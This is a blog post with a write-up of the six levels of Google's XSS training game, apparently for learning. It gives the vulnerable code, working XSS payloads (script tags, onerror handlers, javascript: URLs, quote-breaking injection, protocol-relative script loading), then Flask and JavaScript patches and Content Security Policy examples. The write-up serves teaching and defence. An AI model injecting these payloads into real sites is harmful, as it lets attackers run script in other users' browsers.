<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  
  <title>Cracking and Patching the Google XSS Game | KCCarlos&#39;s Notes</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="description" content="This blog discusses  Solutions to Google’s XSS game Re-implementation and patching code in Python Flask, HTML&#x2F;CSS and JavaScript Some thoughts on using Content Security Policy to defense the code">
<meta property="og:type" content="article">
<meta property="og:title" content="Cracking and Patching the Google XSS Game">
<meta property="og:url" content="https://kccarlos.github.io/2022/10/15/Cracking-and-Patching-the-Google-XSS-Game/index.html">
<meta property="og:site_name" content="KCCarlos&#39;s Notes">
<meta property="og:description" content="This blog discusses  Solutions to Google’s XSS game Re-implementation and patching code in Python Flask, HTML&#x2F;CSS and JavaScript Some thoughts on using Content Security Policy to defense the code">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://kccarlos.github.io/uploads/package_capturing.png">
<meta property="article:published_time" content="2022-10-15T19:25:07.000Z">
<meta property="article:modified_time" content="2022-11-06T20:59:58.569Z">
<meta property="article:author" content="kccarlos">
<meta property="article:tag" content="XSS">
<meta property="article:tag" content="Hacking">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://kccarlos.github.io/uploads/package_capturing.png">
  
    <link rel="alternate" href="/atom.xml" title="KCCarlos's Notes" type="application/atom+xml">
  
  
    <link rel="shortcut icon" href="/favicon.png">
  
  
    
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/typeface-source-code-pro@0.0.71/index.min.css">

  
  
<link rel="stylesheet" href="/css/style.css">

  
    
<link rel="stylesheet" href="/fancybox/jquery.fancybox.min.css">

  
<meta name="generator" content="Hexo 6.3.0"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">KCCarlos&#39;s Notes</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
          <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS Feed"></a>
        
        <a id="nav-search-btn" class="nav-icon" title="Search"></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="https://kccarlos.github.io"></form>
      </div>
    </div>
  </div>
</header>

      <div class="outer">
        <section id="main"><article id="post-Cracking-and-Patching-the-Google-XSS-Game" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  <div class="article-meta">
    <a href="/2022/10/15/Cracking-and-Patching-the-Google-XSS-Game/" class="article-date">
  <time class="dt-published" datetime="2022-10-15T19:25:07.000Z" itemprop="datePublished">2022-10-15</time>
</a>
    
  <div class="article-category">
    <a class="article-category-link" href="/categories/web-security/">web-security</a>
  </div>

  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="p-name article-title" itemprop="headline name">
      Cracking and Patching the Google XSS Game
    </h1>
  

      </header>
    
    <div class="e-content article-entry" itemprop="articleBody">
      
        <p>This blog discusses</p>
<ul>
<li>Solutions to Google’s <a target="_blank" rel="noopener" href="https://xss-game.appspot.com/">XSS game</a></li>
<li>Re-implementation and patching code in Python Flask, HTML&#x2F;CSS and JavaScript</li>
<li>Some thoughts on using Content Security Policy to defense the code</li>
</ul>
<p>If you want the code, go to <a target="_blank" rel="noopener" href="https://github.com/kccarlos/googlexssgame">this repo</a>. So let’s dive in!</p>
<!-- TABLE OF CONTENTS -->
  <ol>
    <li>
      <a href="#preface-unable-to-advance-to-level-2">Preface - Unable to advance to level 2?</a>
    </li>
    <li>
      <a href="#xss-game-solutions">XSS Game Solutions</a>
      <ul>
        <li><a href="#level-1">Level 1</a></li>
        <li><a href="#level-2">Level 2</a></li>
        <li><a href="#level-3">Level 3</a></li>
        <li><a href="#level-4">Level 4</a></li>
        <li><a href="#level-5">Level 5</a></li>
        <li><a href="#level-6">Level 6</a></li>
      </ul>
    </li>
    <li><a href="#patching">Re-implementing locally and Patching</a></li>
    <ul>
      <li><a href="#how-to-run-code">How to Run Code</a></li>
    </ul>
    <li><a href="#defense-via-content-security-policy">Defense via Content Security Policy</a></li>
  </ol>


<h2 id="Preface-Unable-to-Advance-to-Level-2"><a href="#Preface-Unable-to-Advance-to-Level-2" class="headerlink" title="Preface Unable to Advance to Level 2"></a>Preface Unable to Advance to Level 2</h2><p>As of October 2022, the game server has a bug. You may find yourself unable to advance to the next level after cracking the first level puzzle. This is because the game server will send a cookie that has already expired. Then, the the browser will discard it after checking the date.</p>
<p>One solution is to <strong>capture the packet and modify the cookie date before the packet reach the browser</strong>. You can use the packet capturing tools like <a target="_blank" rel="noopener" href="https://portswigger.net/burp/communitydownload">Brup Suite Community Edition</a>. This screenshot shows a server response of one of my submission. Note that the cookie expire date is 22&#x2F;<strong>Jul</strong>&#x2F;2022 12:34:56 GMT (highlighted in orange color).</p>
<p><img src="/uploads/package_capturing.png" alt="packagecapturing"></p>
<p>Then, manually change it to a future date and forward the package. In my case, I changed it to 22&#x2F;Oct&#x2F;2022 12:34:56 GMT. Then, the browser will keep this cookie and attach it to the next request for next level.</p>
<p>Another possible solution is to <strong>change the computer time of the browser to before 2&#x2F;Jul&#x2F;2022 12:34:56 GMT</strong>. In this way, you can avoid the hassle of repetitively modifying the cookie each time you advance to the next level.</p>
<h2 id="XSS-Game-Solutions"><a href="#XSS-Game-Solutions" class="headerlink" title="XSS Game Solutions"></a>XSS Game Solutions</h2><h3 id="Level-1"><a href="#Level-1" class="headerlink" title="Level 1"></a>Level 1</h3><ul>
<li>Vulnerable code is as follows. The website directly take the input from a user and render it as part of the website with no sanitization. As a result, the browser will think the user input is part of the code and execute it.</li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">message = &quot;Sorry, no results were found for &lt;b&gt;&quot; + query + &quot;&lt;/b&gt;.&quot;</span><br></pre></td></tr></table></figure>

<ul>
<li>How to trigger the vulnerability? input the following string in the search bar and click on search.</li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;alert();&lt;/script&gt;</span><br></pre></td></tr></table></figure>


<h3 id="Level-2"><a href="#Level-2" class="headerlink" title="Level 2"></a>Level 2</h3><ul>
<li>Vulnerable code: again the user’s input does not have sanitization and is stored in <code>post[i].message</code></li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">html += &quot;&lt;blockquote&gt;&quot; + posts[i].message + &quot;&lt;/blockquote&quot;;</span><br></pre></td></tr></table></figure>

<ul>
<li>How to trigger the vulnerability: input the following string in the textfield and click on “Share status!”. The browser will execute this new code and try to find <code>image.gif</code>. It will fail and trigger <code>alert()</code></li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;/blockquote&gt;&lt;img src=&quot;image.gif&quot; onerror=&quot;alert()&quot;&gt;&lt;blockquote&gt;</span><br></pre></td></tr></table></figure>

<h3 id="Level-3"><a href="#Level-3" class="headerlink" title="Level 3"></a>Level 3</h3><ul>
<li>Vulnerable code: this web app will directly take the section that follows <code>#</code> of the URL and pass it into  <code>chooseTab()</code>. <code>chooseTab()</code> will directly embed it into the image tag.</li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">chooseTab(unescape(self.location.hash.substr(1)) || &quot;1&quot;);</span><br><span class="line">...</span><br><span class="line"></span><br><span class="line">//in chooseTab</span><br><span class="line">html += &quot;&lt;img src=&#x27;/static/level3/cloud&quot; + num + &quot;.jpg&#x27; /&gt;&quot;;</span><br></pre></td></tr></table></figure>

<ul>
<li>How to trigger the vulnerability: navigate to this URL. Here, the first <code>&#39;</code> will end the image src string. Since the browser cannot find <code>/static/level3/cloud</code>, it will run the function following <code>onerror</code> and trigger <code>alert()</code></li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https://xss-game.appspot.com/level3/frame#$(&#x27;&lt;img src=x onerror=alert(1)&gt;&#x27;)</span><br></pre></td></tr></table></figure>

<h3 id="Level-4"><a href="#Level-4" class="headerlink" title="Level 4"></a>Level 4</h3><ul>
<li>Vulnerable code: this web app will take the user input and pass it to <code>startTimer()</code>. <code>startTimer()</code> will directly use this input.</li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&lt;img src=&quot;/static/loading.gif&quot; onload=&quot;startTimer(&#x27;&#123;&#123; timer &#125;&#125;&#x27;);&quot; /&gt;</span><br><span class="line"></span><br><span class="line">function startTimer(seconds) &#123;</span><br><span class="line">   seconds = parseInt(seconds) || 3;</span><br><span class="line">... &#125;</span><br></pre></td></tr></table></figure>

<ul>
<li>How to trigger the vulnerability. Input the following in the text field. <code>3&#39;)</code> will finish the <code>startTimer()</code> function. Then, it will inject an alert function and get executed.</li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">3&#x27;); alert(&#x27;</span><br></pre></td></tr></table></figure>

<h3 id="Level-5"><a href="#Level-5" class="headerlink" title="Level 5"></a>Level 5</h3><ul>
<li>Vulnerable code: this web app will take the user get request and find out the parameter of <code>next</code>. Then, in HTML it will use it as a hyperlink directly</li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">self.render_template(&#x27;confirm.html&#x27;, &#123;&#x27;next&#x27;: self.request.get(&#x27;next&#x27;, &#x27;welcome&#x27;)&#125;)</span><br><span class="line"></span><br><span class="line">&lt;a href=&quot;&#123;&#123; next &#125;&#125;&quot;&gt;Next &gt;&gt;&lt;/a&gt;</span><br></pre></td></tr></table></figure>

<ul>
<li>How to trigger the vulnerability: navigate to this URL and click on <code>Next &gt;&gt;</code>. Here we make the parameter of <code>next</code> become <code>javascript:alert()</code>, so the hyperlink <code>href=&quot;javascript:alert()&quot;</code> will make browser to run <code>alert()</code> as javascript code.<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https://xss-game.appspot.com/level5/frame/signup?next=javascript:alert();</span><br></pre></td></tr></table></figure></li>
</ul>
<h3 id="Level-6"><a href="#Level-6" class="headerlink" title="Level 6"></a>Level 6</h3><ul>
<li>Vulnerable code: this web app will take the section that follows <code>#</code> of the URL in <code>getGadgetName()</code>. Then attempt to load this URL as javascript.</li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">includeGadget(getGadgetName());</span><br><span class="line"></span><br><span class="line">function getGadgetName() &#123;</span><br><span class="line">  return window.location.hash.substr(1) || &quot;/static/gadget.js&quot;;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">// In includeGadget</span><br><span class="line">var scriptEl = document.createElement(&#x27;script&#x27;);</span><br><span class="line">...</span><br><span class="line">scriptEl.src = url;</span><br></pre></td></tr></table></figure>

<ul>
<li>How to trigger the vulnerability: navigate to this URL. Here the <code>//www.google.com/jsapi?callback=alert</code> contains script to trigger <code>alert()</code>. Even though the script added a regular expression to check if the URL contains <code>http</code>, it cannot stop this attack because no <code>http</code> keyword is included. When browser notice that no protocal is given, it will add it automatically. Using <code>hTtp://..</code> is also OK since it’s case insensitive.</li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https://xss-game.appspot.com/level6/frame#//www.google.com/jsapi?callback=alert</span><br></pre></td></tr></table></figure>

<h2 id="Patching"><a href="#Patching" class="headerlink" title="Patching"></a>Patching</h2><h3 id="How-to-run-code"><a href="#How-to-run-code" class="headerlink" title="How to run code"></a>How to run code</h3><ul>
<li>To run the code of level 1, go to <code>l1</code> folder and start the flask server. (For level X, go to <code>lx</code>. For example, level 2 is at <code>src/patch/l2</code>.</li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">cd code/patch/l1</span><br><span class="line">python -m flask --app level1 run</span><br></pre></td></tr></table></figure>

<ul>
<li>Then, navigate to <a target="_blank" rel="noopener" href="https://localhost:5000/">https://localhost:5000</a> to view the web app</li>
</ul>
<h3 id="Level-1-1"><a href="#Level-1-1" class="headerlink" title="Level 1"></a>Level 1</h3><p>To ensure that the users’ input is properly escaped, I used the <code>markupSafe</code> library coming along with Flask.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">from markupsafe import escape</span><br><span class="line"></span><br><span class="line">...</span><br><span class="line">query = escape(request.args.get(&#x27;query&#x27;))</span><br><span class="line">message = f&quot;Sorry, no results were found for &lt;b&gt; &#123;query&#125; &lt;/b&gt;.&quot;</span><br><span class="line">...</span><br></pre></td></tr></table></figure>

<p><code>escape()</code> will return a markup object that ensure that any string used along with it will be properly escaped. For example, <code>&lt;script&gt;alert()&lt;/script&gt;</code> will become <code>&amp;lt;script&amp;gt;alert()&amp;lt;/script&amp;gt;</code>. In this way, the user’s input will be treated plaintext instead of HTML-meaningful tags.</p>
<h3 id="Level-2-1"><a href="#Level-2-1" class="headerlink" title="Level 2"></a>Level 2</h3><p>Similar to task 1, the patch is to replace the special characters so that browser will treat it as plaintext. Here, in Line 38 of <code>index.html</code>, I added two <code>replace()</code> methods to replace <code>&lt;</code> and <code>&gt;</code> into <code>&amp;lt;</code> and <code>&amp;gt;</code> respectively.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">encoded = posts[i].message.replace(/&lt;/g, &quot;&amp;lt;&quot;).replace(/&gt;/g, &quot;&amp;gt;&quot;);</span><br><span class="line">html += &quot;&lt;blockquote&gt;&quot; + encoded + &quot;&lt;/blockquote&quot;;</span><br></pre></td></tr></table></figure>

<h3 id="Level-3-1"><a href="#Level-3-1" class="headerlink" title="Level 3"></a>Level 3</h3><p>To prevent URL injection, my patch is to parse the user’s input URL first. If a number cannot be extracted (potentially having some unexpected characters following the number), then the user will be redirected to tab 1.</p>
<p>Therefore, in Line 38 of <code>index.html</code>, I added a <code>parseInt()</code> function to process the user input as number. Then, a if condition will decide if the number is an expected one.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">num = unescape(parseInt(self.location.hash.substr(1)))</span><br><span class="line">if ((num == 1) || (num == 2) || (num == 3)) &#123;chooseTab(num)&#125;</span><br><span class="line">else &#123;chooseTab(1)&#125;;</span><br></pre></td></tr></table></figure>

<h3 id="Level-4-1"><a href="#Level-4-1" class="headerlink" title="Level 4"></a>Level 4</h3><p>My patch is to parse the user’s input URL first by trying to cast it into an integer. If an integer cannot be obtained (potentially having some unexpected characters following the number), then the user will be redirected to front page to ask for another input.</p>
<p>Therefore, in Line 13 of <code>level4.py</code>, I added a <code>int()</code> function to process the user input into integer. The <code>try</code> statement will catch any error in the integer casting. Only integer will be proceeded with next page.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">try:</span><br><span class="line">    timer = int(request.args.get(&#x27;timer&#x27;))</span><br><span class="line">except Exception as e:</span><br><span class="line">    return render_template(&#x27;index.html&#x27;)</span><br><span class="line">return render_template(&#x27;timer.html&#x27;, timer=timer)</span><br></pre></td></tr></table></figure>

<h3 id="Level-5-1"><a href="#Level-5-1" class="headerlink" title="Level 5"></a>Level 5</h3><p>My patch is to check the user’s input URL against all available routes. If it cannot match any of the routes, the client will be redirect to main page.</p>
<p>Therefore, in both Line 18 and Line 25 of <code>level5.py</code>, I added an <code>if</code> clause to check user’s URL. So the value of <code>next</code> will be confined to avoid exploit.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">availableRoutes = [&#x27;signup&#x27;, &#x27;confirm&#x27;, &#x27;welcome&#x27;]</span><br><span class="line">...</span><br><span class="line">next = request.args.get(&#x27;next&#x27;)</span><br><span class="line">if next in availableRoutes:</span><br><span class="line">    return render_template(&#x27;signup.html&#x27;, next=next)</span><br><span class="line">else:</span><br><span class="line">    return redirect(&quot;/welcome&quot;)</span><br></pre></td></tr></table></figure>

<h3 id="Level-6-1"><a href="#Level-6-1" class="headerlink" title="Level 6"></a>Level 6</h3><p>My patch is to use a regular expression to enforce that only files inside static folder are acceptable.</p>
<p>In Line 22 <code>index.html</code>, the original code has a regular expression that looks for link starting with http. The new regular expression ensures that only urls like <code>#/static/*</code> is acceptable.</p>
<p>For example:</p>
<ul>
<li><code>http://localhost:5000/#/static/gadget.js</code> will be accepted.</li>
<li><code>http://localhost:5000/#//www.google.com/jsapi?callback=alert</code> will be rejected.</li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">var scriptEl = document.createElement(&#x27;script&#x27;);</span><br><span class="line">// Reject the url if it&#x27;s not under the static folder</span><br><span class="line">if (!url.match(/^\/static\//)) &#123;</span><br><span class="line">  if (document.getElementById(&quot;log&quot;)) &#123;</span><br><span class="line">    setInnerText(document.getElementById(&quot;log&quot;),</span><br><span class="line">            &quot;Sorry, cannot load a URL not from /static/.&quot;);</span><br><span class="line">  &#125;</span><br><span class="line">  return;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h2 id="Defense-via-Content-Security-Policy"><a href="#Defense-via-Content-Security-Policy" class="headerlink" title="Defense via Content Security Policy"></a>Defense via Content Security Policy</h2><h3 id="CSP2-0"><a href="#CSP2-0" class="headerlink" title="CSP2.0"></a>CSP2.0</h3><ul>
<li>Example code: <code>default-src &#39;none&#39;; script-src &#39;self&#39;; connect-src &#39;self&#39;; img-src &#39;self&#39;; style-src &#39;self&#39;; base-uri &#39;self&#39;; form-action &#39;self&#39;</code></li>
<li>Patched code using CSP2.0: <code>src/csp2/</code> from <code>l1</code> to <code>l6</code></li>
</ul>
<h3 id="CSP3-0"><a href="#CSP3-0" class="headerlink" title="CSP3.0"></a>CSP3.0</h3><ul>
<li>Example code: <code>script-src &#39;self&#39; &#39;nonce-N42HzqVZYhG0RWr8CwB8hQ==&#39; ;&#39;</code></li>
<li>Patched code is available in <code>./code/csp3/</code> from <code>l1</code> to <code>l6</code>. Inline code is refactored and external files are downloaded to comply with the CPS requirements</li>
</ul>

      
    </div>
    <footer class="article-footer">
      <a data-url="https://kccarlos.github.io/2022/10/15/Cracking-and-Patching-the-Google-XSS-Game/" data-id="cla5uclth0001akz1gc2qgngj" data-title="Cracking and Patching the Google XSS Game" class="article-share-link">Share</a>
      
      
      
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/Hacking/" rel="tag">Hacking</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/XSS/" rel="tag">XSS</a></li></ul>

    </footer>
  </div>
  
    
<nav id="article-nav">
  
  
    <a href="/2019/06/03/How-to-install-and-configure-Samba-on-Ubuntu-14-04/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title">How to Install and Configure Samba on Ubuntu 14.04</div>
    </a>
  
</nav>

  
</article>


</section>
        
          <aside id="sidebar">
  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Categories</h3>
    <div class="widget">
      <ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/Computer-Vision/">Computer-Vision</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/Database/">Database</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/Linux/">Linux</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/web-security/">web-security</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tags</h3>
    <div class="widget">
      <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/Hacking/" rel="tag">Hacking</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/MacOS/" rel="tag">MacOS</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/MySQL/" rel="tag">MySQL</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/OpenCV/" rel="tag">OpenCV</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Samba/" rel="tag">Samba</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Ubuntu/" rel="tag">Ubuntu</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/XSS/" rel="tag">XSS</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tag Cloud</h3>
    <div class="widget tagcloud">
      <a href="/tags/Hacking/" style="font-size: 10px;">Hacking</a> <a href="/tags/MacOS/" style="font-size: 10px;">MacOS</a> <a href="/tags/MySQL/" style="font-size: 10px;">MySQL</a> <a href="/tags/OpenCV/" style="font-size: 10px;">OpenCV</a> <a href="/tags/Samba/" style="font-size: 10px;">Samba</a> <a href="/tags/Ubuntu/" style="font-size: 20px;">Ubuntu</a> <a href="/tags/XSS/" style="font-size: 10px;">XSS</a>
    </div>
  </div>

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/10/">October 2022</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/06/">June 2019</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/03/">March 2019</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2018/11/">November 2018</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2022/10/15/Cracking-and-Patching-the-Google-XSS-Game/">Cracking and Patching the Google XSS Game</a>
          </li>
        
          <li>
            <a href="/2019/06/03/How-to-install-and-configure-Samba-on-Ubuntu-14-04/">How to Install and Configure Samba on Ubuntu 14.04</a>
          </li>
        
          <li>
            <a href="/2019/03/18/Build-OpenCV-3.4.5-from-source-for-Anaconda-on-Ubuntu-16.04-with-CUDA/">Build OpenCV 3.4.5 From Source for Anaconda on Ubuntu 16.04 With Cuda</a>
          </li>
        
          <li>
            <a href="/2018/11/11/How-to-Setup-phpmyadmin-on-MacOS/">How to Setup Phpmyadmin on MacOS</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      
      &copy; 2022 kccarlos<br>
      Powered by <a href="https://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>

    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    


<script src="/js/jquery-3.4.1.min.js"></script>



  
<script src="/fancybox/jquery.fancybox.min.js"></script>




<script src="/js/script.js"></script>





  </div>
</body>
</html>